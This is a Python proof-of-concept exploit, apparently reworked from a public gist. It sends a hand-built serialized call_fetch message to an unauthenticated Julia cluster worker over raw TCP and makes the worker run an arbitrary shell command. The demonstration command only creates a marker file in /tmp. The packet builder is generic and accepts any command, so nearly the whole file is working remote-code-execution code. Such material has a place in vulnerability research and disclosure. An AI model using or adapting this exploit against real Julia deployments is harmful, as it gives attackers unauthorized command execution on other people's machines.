import socket
import time
import struct
from random import randint
# Target worker.  The PoC simply opens a TCP connection to this host/port and
# writes a raw serialized message; no authentication handshake or cookie of
# any kind is attempted anywhere in this script.
TCP_IP = "192.168.213.132"  # host the Julia worker is running on
TCP_PORT = 9009             # port the worker bound for cluster traffic
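def test_packet(packet, timeout=10.0):
    """Deliver one raw message to the worker at TCP_IP:TCP_PORT.

    Opens a fresh TCP connection, writes *packet* in full and closes the
    socket.  Nothing is read back: any reply from the worker is ignored and
    success is judged out-of-band (the gist checks for the file its command
    touches).

    *timeout* bounds connect and send so a filtered port fails fast instead
    of hanging forever.  The one-second pause before close is carried over
    from the original; presumably it gives the worker time to read the whole
    message before the peer disappears -- TODO confirm it is actually needed.

    Raises socket.error (OSError on Python 3) if the worker is unreachable.
    """
    s = socket.create_connection((TCP_IP, TCP_PORT), timeout)
    try:
        # sendall, not send: send() may write only part of the buffer and
        # return without error, silently truncating the message.
        s.sendall(packet)
        time.sleep(1)
    finally:
        # try/finally rather than `with`: Python 2 sockets are not context managers.
        s.close()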
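def encode_length(l):
    """Serialize the non-negative integer *l* the way the worker expects.

    Values 0..32 are emitted as a single tag byte (126 + l); anything larger
    is written as a 0x09 tag followed by the value as a little-endian 64-bit
    unsigned integer.  NOTE(review): this is how the gist encodes the command
    length and the response_oid; it presumably mirrors Julia's serializer
    small-int-literal / Int64 encoding -- verify against the serialize.jl of
    the Julia version under test before relying on the boundary.

    Returns bytes on Python 3 and a ``str`` on Python 2 (``struct.pack`` does
    the right thing on both), so the result concatenates into the packet
    either way.

    Raises ValueError for negative values: the single-byte form would
    otherwise mis-encode them silently (e.g. -1 -> 125, the ``}`` byte).
    Raises struct.error if *l* does not fit in 64 bits.
    """
    if l < 0:
        raise ValueError("length must be non-negative: %r" % (l,))
    if l <= 32:
        # One tag byte; 126 + 32 = 158 still fits in an unsigned byte.
        return struct.pack("B", l + 126)
    return b"\x09" + struct.pack("<Q", l)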
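# Fixed parts of the captured Julia serializer stream.  They are reproduced
# byte-for-byte from the original gist and have NOT been re-derived from
# serialize.jl here; only the fields spliced in by build_packet() vary.
_CALL_FETCH_HEADER = (
    b'\x11\x01\x02\x07CallMsg#t/+\x01\x00\x00\x00\x02\ncall_fetch\x13\x01"\n'
)
_PAYLOAD_BEFORE_COMMAND = (
    b'\x00\x10\x00\x00\x16\x03:1\x151~\x151\x82\x151~\x151~~\x151~\x16\x03;1'
    b'\x1a\x02\x08multi.jl\tr\x05\x00\x00\x00\x00\x00\x00\x16\x03=1\x16\x03=1'
    b'\x1f\x02\x08getfield#t/\x1e\x02\x04eval\x16\x03=1\x1f\x02\x08getfield#t/'
    b'\x1e\x02\x04Main\x16\x01\x02\x07copyast1\x1e\x16\x02=1\x02\x03run'
    b'\x16\x02\x02\tmacrocall1\x02\x04@cmd&\x15'
)
_PAYLOAD_AFTER_COMMAND = (
    b'\x16\x01<1\x16\x03=1\x1f\x02\x08getfield#t/\x1e\x02\x07nothing\x151~+'
    b'\x00\x00\x00\x00{#/}+\x00\x00\x00\x00/\x14\x02\x7f'
)


def build_packet(command, stamp=None):
    """Return the raw ``call_fetch`` message that makes the worker run *command*.

    The message is a pre-captured serializer stream in which only three things
    vary: the command text (embedded as a ``@cmd`` literal handed to ``run``,
    as the gist's own comment describes), its length prefix, and two
    continually-growing numbers derived from *stamp* -- a 32-bit big-endian
    field near the start and the trailing response_oid.  *stamp* defaults to
    the current Unix time; the gist only needs it to be a large, increasing
    number so successive requests do not collide.

    *command* may be ``str`` or ``bytes``.  It is sent as UTF-8 and the length
    prefix counts bytes, not characters (the original used ``len`` on a text
    string, which diverges for non-ASCII commands on Python 3).  The command is
    spliced in verbatim: backticks or other characters special to a Julia
    command literal are not escaped.

    Works on Python 2 and 3; every piece is bytes so no str/bytes mixing occurs.
    """
    if stamp is None:
        stamp = int(time.time())
    if not isinstance(command, bytes):
        command = command.encode("utf-8")
    # One stamp is used for both variable fields; the original sampled
    # time.time() twice, which can only differ across a second boundary.
    return b"".join([
        _CALL_FETCH_HEADER,
        struct.pack(">I", stamp),
        _PAYLOAD_BEFORE_COMMAND,
        encode_length(len(command)),
        command,
        _PAYLOAD_AFTER_COMMAND,
        encode_length(stamp),
    ])


# Marker command: the blob evaluates run(`command`) in Main on the worker, so
# the presence of this file proves code execution.
command = "touch /tmp/code_execution_confirmed"

if __name__ == "__main__":
    # Guarded so importing the module (e.g. to reuse build_packet) does not fire the exploit.
    packet = build_packet(command)
    test_packet(packet)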